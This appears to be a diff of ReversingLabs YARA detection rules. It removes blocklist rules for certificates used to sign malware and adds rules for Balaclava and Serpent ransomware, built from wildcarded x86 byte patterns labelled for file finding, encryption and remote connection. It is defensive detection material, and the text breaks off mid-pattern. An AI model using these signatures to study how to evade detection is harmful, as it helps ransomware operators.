B5 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 52 50 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? BA + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? 50 B8 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 5A 59 E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? + ?? ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 89 45 ?? C6 45 ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? 8B + 5D ?? 4B 85 DB 7C ?? 43 33 F6 80 7D ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? + 8B 14 B2 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? + ?? ?? 8B 15 ?? ?? ?? ?? 8B 14 B2 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? + ?? ?? 88 45 ?? 46 4B 75 ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? 80 7D + ?? ?? 75 ?? 8B 5D ?? 4B 85 DB 7C ?? 43 33 F6 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B + 14 B2 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 46 4B 75 ?? BA ?? ?? + ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8B C8 B8 ?? ?? ?? ?? 5A E8 ?? ?? ?? ?? BA ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8B D0 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 + 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? + 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C8 B8 ?? ?? ?? + ?? 5A E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? + ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8B D3 B8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? FF 35 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 50 8B D3 B8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? + ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B D3 B8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? A1 + ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? + E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? A1 ?? ?? ?? ?? E8 + ?? ?? ?? ?? B2 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? + A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 + ?? ?? ?? ?? 75 ?? E8 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? + ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D + 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Beijing Gigabit Times Technology Co., Ltd" and pe.signatures[i].serial=="77:a6:47:59:f1:27:66:e3:63:d7:79:99:8c:71:bd:c9" and 1301011199<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and $find_files_and_encrypt and $remote_connection_1 and $remote_connection_2 } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_0B0D17Ec1449B4B2D38Fcb0F20Fbcd3A : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Balaclava : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Balaclava ransomware." author = "ReversingLabs" - id = "4484b00d-8fad-5f8f-9030-67216f2820a3" - date = "2023-11-08" - modified = "2023-11-08" + id = "1a17f2e8-f161-55bc-b44e-f8f47ebd9869" + date = "2020-10-01" + modified = "2020-10-01" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2338-L2354" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3121f2c49d0d4c396023924521f2c980045b6f07d082e49447429e9cd640e0ef" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Balaclava.yara#L1-L113" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "01b43e6ea7ceebdbdda7e1f7c5bd2439a460b8aed4a1837755fa3679e9893ff3" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Balaclava" + tc_detection_factor = 5 importance = 25 + strings: + $find_files_p1 = { + 55 8B EC 83 EC ?? 53 56 8B 75 ?? 33 D2 57 6A ?? 5B 8B 7E ?? 89 55 ?? 8D 4F ?? 66 8B + 07 03 FB 66 3B C2 75 ?? 2B F9 B9 ?? ?? ?? ?? D1 FF E8 ?? ?? ?? ?? 50 FF 76 ?? 89 45 + ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 50 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B + 45 ?? 83 C0 ?? 89 45 ?? 8B D8 33 D2 8D 4B ?? 66 8B 03 83 C3 ?? 66 3B C2 75 ?? 2B D9 + D1 FB 8D 04 3B 3D ?? ?? ?? ?? 7C ?? 8D 04 45 ?? ?? ?? ?? 50 39 56 ?? 74 ?? FF 76 ?? + 52 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? EB ?? 52 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? + ?? ?? 39 46 ?? 74 ?? 89 46 ?? 8B 46 ?? 33 C9 66 89 0C 78 8B 55 ?? F7 02 ?? ?? ?? ?? + 0F 85 ?? ?? ?? ?? 33 D2 8B C2 6A ?? 89 45 ?? 59 89 4D ?? 3B C1 7F ?? 03 C1 8B 4D ?? + 99 2B C2 D1 F8 89 45 ?? 8B 14 85 ?? ?? ?? ?? 66 8B 01 66 3B 02 75 ?? 66 85 C0 74 ?? + 66 8B 41 ?? 66 3B 42 ?? 75 ?? 83 C1 ?? 83 C2 ?? 66 85 C0 75 ?? 33 D2 8B C2 EB ?? 1B + C0 83 C8 ?? 33 D2 85 C0 0F 84 ?? ?? ?? ?? 79 ?? 8B 4D ?? 8B 45 ?? 49 EB ?? 8B 45 ?? + 8B 4D ?? 40 89 45 ?? EB ?? 8B 45 ?? F6 00 ?? 0F 84 ?? ?? ?? ?? 8D 04 5D ?? ?? ?? ?? + 50 8B 46 ?? FF 75 ?? 8D 04 78 83 C0 ?? 50 E8 ?? ?? ?? ?? 8B 4E ?? 83 C4 ?? 8B 46 ?? + 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 + ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7E ?? ?? 74 + ?? 83 7E ?? ?? 7E ?? FF 76 ?? 8B 4E ?? FF 76 ?? E8 ?? ?? ?? ?? 59 59 8B 4E ?? 8D 14 + } + $find_files_p2 = { + 3B A1 ?? ?? ?? ?? 56 89 44 51 ?? 66 A1 ?? ?? ?? ?? 66 89 44 51 ?? FF 46 ?? E8 ?? ?? + ?? ?? FF 4E ?? E9 ?? ?? ?? ?? 39 56 ?? 0F 85 ?? ?? ?? ?? 8D 04 5D ?? ?? ?? ?? 50 8B + 46 ?? FF 75 ?? 8D 04 78 83 C0 ?? 50 E8 ?? ?? ?? ?? 8B 5E ?? 83 C4 ?? 8B CB B8 ?? ?? + ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? + 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B CB 8D + 51 ?? 66 8B 01 83 C1 ?? 66 3B 45 ?? 75 ?? 2B CA D1 F9 83 F9 ?? 72 ?? 8B CB 8D 51 ?? + 66 8B 01 83 C1 ?? 66 3B 45 ?? 75 ?? 2B CA D1 F9 83 C1 ?? 68 ?? ?? ?? ?? 8D 04 4B 50 + FF 15 ?? ?? ?? ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 00 A8 ?? 74 ?? 83 E0 ?? + 50 FF 76 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BB ?? ?? ?? ?? 53 FF + 15 ?? ?? ?? ?? EB ?? 85 C0 75 ?? 6A ?? 53 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 0D ?? + ?? ?? ?? 6A ?? 58 3B C8 A1 ?? ?? ?? ?? 74 ?? 83 F8 ?? 74 ?? FF 76 ?? A1 ?? ?? ?? ?? + 33 D2 6A ?? 03 C1 59 F7 F1 FF 34 95 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 05 ?? ?? ?? ?? + FF 05 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 46 ?? 6A + ?? 59 66 89 4C 78 ?? 33 C9 8B 46 ?? 66 89 0C 78 FF 75 ?? 8B 5D ?? 53 FF 15 ?? ?? ?? + ?? 85 C0 74 ?? 8B 45 ?? E9 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 5D ?? 33 FF 39 7E ?? + 75 ?? 89 3E 53 FF 15 ?? ?? ?? ?? 8B DF 8B 4D ?? E8 ?? ?? ?? ?? 5F 5E 8B C3 5B 8B E5 + 5D C2 + } + $encrypt_files_p1 = { + 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 55 ?? 8B C1 89 45 ?? C7 45 ?? ?? ?? + ?? ?? 33 F6 89 75 ?? 83 4D ?? ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 75 + ?? 56 68 ?? ?? ?? ?? 6A ?? 56 56 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? + 83 FB ?? 74 ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 0B 45 ?? 74 ?? + 8B FE EB ?? 33 FF 47 89 7D ?? 85 FF 0F 85 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 + 45 ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? FF 75 ?? FF D0 8B C8 A1 ?? ?? ?? ?? EB ?? 8B + CE 85 C9 0F 84 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? FF 75 ?? FF D0 EB ?? 8B C6 85 C0 0F 84 + ?? ?? ?? ?? 56 8D 45 ?? 50 68 ?? ?? ?? ?? 8B 7D ?? 57 53 FF 15 ?? ?? ?? ?? 85 C0 75 + ?? 83 CF ?? 89 7D ?? E9 ?? ?? ?? ?? 8B 45 ?? 3B C6 7C ?? 8B 4D ?? 7F ?? 81 F9 ?? ?? + ?? ?? 76 ?? 81 E9 ?? ?? ?? ?? 1B C6 50 51 33 D2 8B CB E8 ?? ?? ?? ?? 59 59 23 C2 89 + } + $encrypt_files_p2 = { + 75 ?? 85 F6 75 ?? 56 8D 45 ?? 50 68 ?? ?? ?? ?? 8B 45 ?? 03 C7 50 53 FF 15 ?? ?? ?? + ?? 8B FE 89 7D ?? EB ?? 56 56 6A ?? 5A 8B CB E8 ?? ?? ?? ?? 59 59 23 C2 8B FE 89 7D + ?? 85 FF 75 ?? 56 8D 45 ?? 50 6A ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? + ?? ?? 8B 4D ?? FF 71 ?? FF 71 ?? 8D 41 ?? 50 FF 71 ?? 6A ?? 5A 8B 4D ?? E8 ?? ?? ?? + ?? 83 C4 ?? 0F B6 C0 23 F8 89 7D ?? 0F 85 ?? ?? ?? ?? 56 8D 45 ?? 50 8B 45 ?? FF 70 + ?? FF 70 ?? 53 FF 15 ?? ?? ?? ?? 56 8D 45 ?? 50 8B 45 ?? FF 70 ?? FF 70 ?? 53 FF 15 + ?? ?? ?? ?? 51 8B 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8D 45 ?? 50 8B 55 ?? 52 + 8B 4D ?? 8B 45 ?? 03 C1 50 52 51 51 8B 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 + ?? 85 C0 75 ?? 56 8D 45 ?? 50 6A ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 53 FF 15 ?? ?? + ?? ?? 56 56 33 D2 8B CB E8 ?? ?? ?? ?? 59 59 56 8D 45 ?? 50 FF 75 ?? FF 75 ?? 53 FF + 15 ?? ?? ?? ?? 83 7D ?? ?? 76 ?? 8B 45 ?? 2D ?? ?? ?? ?? 8B 4D ?? 1B CE 51 50 33 D2 + 8B CB E8 ?? ?? ?? ?? 59 59 56 8D 45 ?? 50 FF 75 ?? 8B 45 ?? 03 45 ?? 50 53 FF 15 ?? + ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 4D ?? ?? E8 ?? ?? ?? ?? 8B C7 E8 ?? ?? ?? ?? C3 + } + $find_volumes = { + 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 33 DB 53 8D 85 ?? ?? + ?? ?? 50 E8 ?? ?? ?? ?? 56 53 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? + ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 83 FF ?? 0F 84 ?? ?? ?? + ?? 89 5D ?? 6A ?? 5B 8D B5 ?? ?? ?? ?? 8D 4E ?? 33 D2 66 8B 06 83 C6 ?? 66 3B C2 75 + ?? 2B F1 D1 FE 66 39 9D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 66 39 9D ?? ?? ?? ?? 75 ?? 66 + 83 BD ?? ?? ?? ?? ?? 75 ?? 66 39 9D ?? ?? ?? ?? 75 ?? 66 39 9C 75 ?? ?? ?? ?? 75 ?? + 33 C0 66 89 84 75 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? + 50 FF 15 ?? ?? ?? ?? 66 89 9C 75 ?? ?? ?? ?? 85 C0 74 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? + ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 4D ?? ?? E8 ?? ?? ?? ?? EB ?? 8B 7D ?? 57 FF 15 ?? + ?? ?? ?? 8B 65 ?? E8 ?? ?? ?? ?? C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "WEBPIC DESENVOLVIMENTO DE SOFTWARE LTDA" and pe.signatures[i].serial=="0b:0d:17:ec:14:49:b4:b2:d3:8f:cb:0f:20:fb:cd:3a" and 1394150399<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_volumes) and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_Fe9404Dc73Cf1C2Ba1450B8398305557 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Serpent : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Serpent ransomware." author = "ReversingLabs" - id = "17700719-81ea-58d4-87f5-4d5c1b19bf64" - date = "2023-11-08" - modified = "2023-11-08" + id = "0757ad7c-b2b1-5323-960a-55ffe3eaed12" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2356-L2374" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c0132d71de1384f6e534dd154eba88c4a51c43b7dfe984f3064ba4feffa4dd5a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Serpent.yara#L1-L122" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5e1917e8d23a5edc65ac423f3d18cc78c3848bd6c1ccc67d052eb37172857081" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Serpent" + tc_detection_factor = 5 importance = 25 + strings: + $do_dll_stuff_and_create_thread = { + 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 68 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 89 D2 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 89 FF 90 90 6A ?? 53 E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? + ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? BB ?? ?? ?? ?? 4B 75 ?? BA + ?? ?? ?? ?? 66 0F 6E D2 89 FF 89 C9 31 D2 66 0F 7E D2 89 15 ?? ?? ?? ?? 81 3D ?? ?? + ?? ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? BB ?? ?? ?? ?? 4B 75 ?? BB ?? ?? ?? ?? 89 C9 4B + 75 ?? 89 C9 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? BB ?? ?? ?? ?? 4B + 75 ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 79 ?? E8 ?? + ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 79 ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 4B + 75 ?? 89 FF 90 BB ?? ?? ?? ?? 89 C9 4B 75 ?? 90 90 BB ?? ?? ?? ?? 4B 75 ?? BB ?? ?? + ?? ?? 4B 75 ?? BB ?? ?? ?? ?? 4B 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 50 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 90 BB ?? ?? ?? ?? 89 D2 4B 75 ?? 6A ?? 68 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? BA ?? + ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 90 89 C9 BB ?? ?? ?? ?? 89 FF 4B 75 ?? 68 ?? ?? ?? ?? + 6A ?? 56 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 89 D2 4B 75 ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 33 + C0 A3 ?? ?? ?? ?? 64 8B 35 ?? ?? ?? ?? 89 35 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? + 90 89 F6 90 BB ?? ?? ?? ?? 89 DB 4B 75 ?? 89 D2 89 C0 BB ?? ?? ?? ?? 89 D2 4B 75 ?? + C7 05 ?? ?? ?? ?? ?? ?? ?? ?? BB ?? ?? ?? ?? 89 FF 4B 75 ?? 89 C0 0F 31 90 89 C7 0F + 31 90 89 C0 29 F8 89 D2 89 DB 77 ?? 90 90 89 C9 89 F6 8B 3D ?? ?? ?? ?? 90 90 89 C9 + 89 F6 90 03 3D ?? ?? ?? ?? 90 90 89 C9 89 F6 FF D7 89 F6 90 90 BB ?? ?? ?? ?? 4B 75 + ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? C3 + } + $find_files = { + 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 C0 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? + ?? ?? ?? 89 85 ?? ?? ?? ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45 + ?? 8B 58 ?? 83 7B ?? ?? 75 ?? 8D 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 8D 55 ?? + A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 73 ?? 6A ?? 8D 45 ?? 50 8B 43 ?? 50 E8 ?? ?? ?? ?? + 81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? + 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 43 ?? 89 85 ?? ?? ?? ?? C6 85 ?? ?? ?? + ?? ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? + ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C6 85 ?? + ?? ?? ?? ?? 8B 45 ?? 89 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? C6 85 + ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B 8D ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 EB ?? 8B 43 ?? 89 + 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8B 45 ?? 89 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? + 89 B5 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 95 ?? ?? ?? ?? + A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8B D8 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 + } + $remote_connection = { + 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 FF 05 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 85 ?? + ?? ?? ?? 8D 83 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 66 8B 83 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? + ?? ?? 8D 55 ?? 33 C0 8A 83 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 51 ?? 68 ?? ?? ?? ?? 66 8B 83 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? + ?? ?? 8D 55 ?? 33 C0 8A 83 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? + ?? E8 ?? ?? 